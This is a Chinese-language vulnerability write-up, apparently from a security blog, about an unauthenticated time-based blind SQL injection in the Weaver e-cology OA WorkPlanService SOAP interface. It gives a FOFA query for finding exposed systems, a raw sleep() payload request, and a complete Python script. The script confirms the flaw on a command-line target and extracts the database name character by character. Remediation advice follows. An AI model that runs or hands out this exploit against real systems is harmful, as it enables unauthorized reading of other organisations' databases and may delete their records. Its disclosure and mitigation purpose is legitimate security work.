0x00、声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。
中华人民共和国网络安全法
第二十七条 规定
任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
0x01、产品概述
泛微e-cology依托全新的设计理念,全新的管理思想,为中大型组织创建全新的高效协同办公环境。标准化产品+个性化开发,适合集团型组织OA软件
0x02、漏洞描述:
泛微 e-cology 平台 `/services/WorkPlanService` WebService 接口的 `deleteWorkPlan` 方法，其字符串参数 `in0` 存在 SQL 注入，可通过时间盲注（sleep 延时）方式验证和利用。下文的请求包中未携带任何认证信息（疑为未授权即可调用，需实测确认）。
0x03、资产测绘
FOFA:app="泛微-EOffice"||app="泛微-OA(e-cology)"（注：E-Office 与 e-cology 是不同产品线，本文漏洞点在 e-cology 的 WorkPlanService 接口，E-Office 资产是否受影响需另行验证）
0x04、漏洞复现
4.1、数据包测试
1、POST请求包（注意：调用的是 deleteWorkPlan 方法，in1=22 疑为待删除的计划记录 ID，探测前请先在测试环境确认不会误删数据）
POST /services/WorkPlanService HTTP/1.1
Host: <目标主机>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(select 111 from (select sleep(5))aaaa)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
测试截图:（判定依据：载荷为 sleep(5)，响应延迟约 5 秒即说明注入的 SQL 被执行）
4.2、py脚本
通过时间盲注（sleep 延时）探测漏洞是否存在，并逐字符枚举当前数据库名（schema()）；脚本中的 url 默认为 https://127.0.0.1，使用前需替换为实际目标。
# -*- coding: utf-8 -*-
import string
import sys
import time

import requests
# Silence urllib3's InsecureRequestWarning. NOTE(review): this only hides the
# warning — none of the requests.post() calls below pass verify=False, so an
# HTTPS target with a self-signed certificate still fails with SSLError (caught
# and printed as "An error occurred"). Decide explicitly whether to disable
# certificate verification (it allows MITM) instead of relying on this line.
requests.packages.urllib3.disable_warnings()
# Request headers shared by every probe below: a browser-like User-Agent
# (carrying WeChat / MicroMessenger tokens) and the text/xml content type the
# SOAP endpoint expects.
headers = dict(
    [
        (
            'User-Agent',
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a1b)XWEB/9165',
        ),
        ('Content-Type', 'text/xml;charset=UTF-8'),
    ]
)
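def len_(url0, sql_0, *, max_len=20, delay=3, post=None, request_headers=None):
    """Find ``length(sql_0)`` on the target via time-based blind SQL injection.

    One SOAP request is sent per candidate length ``1 .. max_len - 1``. The
    injected expression calls ``sleep(delay)`` only when the candidate equals
    ``length(sql_0)``, so the first response that takes roughly ``delay``
    seconds identifies the length.

    Args:
        url0: Full URL of the ``WorkPlanService`` SOAP endpoint.
        sql_0: SQL expression whose length is wanted, e.g. ``schema()``. It is
            interpolated into the payload verbatim (no quoting).
        max_len: Exclusive upper bound on the candidate lengths. The default
            20 matches the original hard-coded ``range(1, 20)``; raise it for
            long names (MySQL identifiers can be up to 64 characters).
        delay: Seconds the ``sleep()`` payload requests. A hit is a response
            time in ``[delay, delay + 1)``; the 1 s ceiling (kept from the
            original) rejects generally slow targets, so a high-latency link
            may need a larger ``delay``.
        post: Callable with ``requests.post``'s keyword interface
            (``url=, data=, headers=, timeout=``). Defaults to
            ``requests.post``; pass ``requests.Session().post`` or a
            ``functools.partial`` to add proxies or ``verify=False``.
        request_headers: Headers to send; defaults to the module-level
            ``headers``.

    Returns:
        The detected length (int).

    Raises:
        SystemExit: via ``sys.exit()`` when no candidate produced the delay
            (kept from the original script; the caller relies on it).
    """
    send = requests.post if post is None else post
    hdrs = headers if request_headers is None else request_headers
    for candidate in range(1, max_len):
        # SOAP body for WorkPlanService.deleteWorkPlan: in0 (string) is the
        # injection point; in1 (int) is left at the original fixed value.
        data = f'''<soapenv:Envelope
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:web="webservices.workplan.weaver.com.cn"
>
    <soapenv:Header />
    <soapenv:Body>
        <web:deleteWorkPlan>
            <!--type: string-->
            <web:in0>(select 111 from (select (if({candidate}=(select length({sql_0})),sleep({delay}),1)))aaaa)</web:in0>
            <!--type: int-->
            <web:in1>22</web:in1>
        </web:deleteWorkPlan>
    </soapenv:Body>
</soapenv:Envelope>'''
        try:
            # perf_counter is monotonic; time.time() can jump with clock
            # adjustments and skew the measurement.
            started = time.perf_counter()
            send(url=url0, data=data, headers=hdrs, timeout=20)
            elapsed = time.perf_counter() - started
        except requests.exceptions.RequestException as err:
            print("An error occurred:", err)
            continue
        if delay <= elapsed < delay + 1:
            print(f"the len({sql_0}) is : ", candidate)
            return candidate
    print("no result!!!maybe have error!!")
    sys.exit()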
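def name_(url0, len_l, sql_0, *, delay=3, post=None, request_headers=None, charset=None):
    """Recover the value of ``sql_0`` one character at a time.

    For each position ``1 .. len_l`` (MySQL ``substring`` is 1-based — the
    original started at 0, which wasted a full round of requests on an empty
    substring) every candidate character is tried; the payload sleeps only
    when ``ascii(substring(sql_0, pos, 1))`` equals the candidate's code.

    Args:
        url0: Full URL of the ``WorkPlanService`` SOAP endpoint.
        len_l: Number of characters to recover (as returned by ``len_``).
        sql_0: SQL expression to read, interpolated verbatim.
        delay: Seconds the ``sleep()`` payload requests; a hit is a response
            time in ``[delay, delay + 1)``.
        post: Callable with ``requests.post``'s keyword interface; defaults
            to ``requests.post``.
        request_headers: Headers to send; defaults to the module-level
            ``headers``.
        charset: Candidate characters in the order to try them. The default
            tries ``[a-z0-9_A-Z]`` first and then the rest of printable ASCII
            (codes 32..126). The original only tried codes 64..126 and so
            could never recover a digit. Non-ASCII names are not handled
            (``ascii()`` presumably returns only the first byte).

    Returns:
        The recovered string (also printed). Returns ``""`` for ``len_l == 0``.

    Raises:
        SystemExit: via ``sys.exit()`` when fewer than ``len_l`` characters
            were recovered (kept from the original).
    """
    send = requests.post if post is None else post
    hdrs = headers if request_headers is None else request_headers
    if charset is None:
        likely = string.ascii_lowercase + string.digits + "_" + string.ascii_uppercase
        charset = likely + "".join(chr(c) for c in range(32, 127) if chr(c) not in likely)
    found = []
    for pos in range(1, len_l + 1):
        for ch in charset:
            code = ord(ch)
            # Only the integer code goes into the payload, so XML/SQL
            # metacharacters in `charset` cannot break the request.
            data = f'''<soapenv:Envelope
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:web="webservices.workplan.weaver.com.cn"
>
    <soapenv:Header />
    <soapenv:Body>
        <web:deleteWorkPlan>
            <!--type: string-->
            <web:in0>(select 111 from (select (if({code}=(select ascii(substring({sql_0},{pos},1))),sleep({delay}),1)))aaaa)</web:in0>
            <!--type: int-->
            <web:in1>22</web:in1>
        </web:deleteWorkPlan>
    </soapenv:Body>
</soapenv:Envelope>
'''
            try:
                started = time.perf_counter()
                send(url=url0, data=data, headers=hdrs, timeout=20)
                elapsed = time.perf_counter() - started
            except requests.exceptions.RequestException as err:
                print("An error occurred:", err)
                continue
            if delay <= elapsed < delay + 1:
                print(f"on the {pos} is:", ch)
                found.append(ch)
                break
    if len(found) != len_l:
        print("find name fail or have error!!!! please check !!!")
        sys.exit()
    name = ''.join(found)
    print("find the name is:", name)
    return name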
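def vuln_t(url, *, delay=3, post=None, request_headers=None):
    """Send one unconditional ``sleep(delay)`` payload and report whether it fired.

    Args:
        url: Full URL of the ``WorkPlanService`` SOAP endpoint.
        delay: Seconds the ``sleep()`` payload requests. A hit is a response
            time in ``[delay, delay + 2)`` — the original's window, wider
            than the one ``len_``/``name_`` use.
        post: Callable with ``requests.post``'s keyword interface; defaults
            to ``requests.post``.
        request_headers: Headers to send; defaults to the module-level
            ``headers``.

    Returns:
        1 when the delay was observed, else 0 (including when the request
        itself failed, which is printed as "An error occurred").

    A single timing probe can false-positive on a slow or overloaded target;
    confirm with a control request that omits ``sleep()`` before trusting it.
    NOTE(review): the SOAP method is ``deleteWorkPlan`` with ``in1=22``;
    whether the probe can delete a real record is not shown here — verify on
    a test instance first.
    """
    send = requests.post if post is None else post
    hdrs = headers if request_headers is None else request_headers
    data = f'''<soapenv:Envelope
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:web="webservices.workplan.weaver.com.cn"
>
    <soapenv:Header />
    <soapenv:Body>
        <web:deleteWorkPlan>
            <!--type: string-->
            <web:in0>(select 111 from (select (if(1=1,sleep({delay}),1)))aaaa)</web:in0>
            <!--type: int-->
            <web:in1>22</web:in1>
        </web:deleteWorkPlan>
    </soapenv:Body>
</soapenv:Envelope>
'''
    try:
        # Monotonic clock: wall-clock time.time() may jump mid-measurement.
        started = time.perf_counter()
        send(url=url, data=data, headers=hdrs, timeout=20)
        elapsed = time.perf_counter() - started
    except requests.exceptions.RequestException as err:
        print("An error occurred:", err)
    else:
        if delay <= elapsed < delay + 2:
            print(f"find {url} exists vuln!!!")
            return 1
    print("maybe no vuln!!")
    return 0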
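if __name__ == "__main__":
    # Target base URL from the command line (first argument); the original
    # hard-coded localhost default is kept for local testing. A trailing
    # slash would otherwise yield ".../services" as "//services".
    url = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "https://127.0.0.1"
    url0 = f"{url}/services/WorkPlanService"
    if vuln_t(url0):
        sql_0 = "schema()"  # current database name
        name_(url0, len_(url0, sql_0), sql_0)
    print("complete!!!")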
0x05、修复建议
临时缓解方案
在官方补丁可用前：使用 WAF/防护设备拦截对 `/services/WorkPlanService` 等 WebService 接口中携带 `sleep(`、`select` 等 SQL 关键字的请求；将 `/services/` 路径限制为仅允许可信来源访问；如非必要，不要将受影响系统放置在公网上。根本修复需在代码层面使用预编译语句、绑定变量，并对输入做校验和过滤。
升级修复方案
官方已发布新版本修复漏洞,建议尽快访问官网或联系官方售后支持获取版本升级安装包或补丁。升级后可用本文的 sleep 载荷复测，响应不再出现对应延迟即表示修复生效。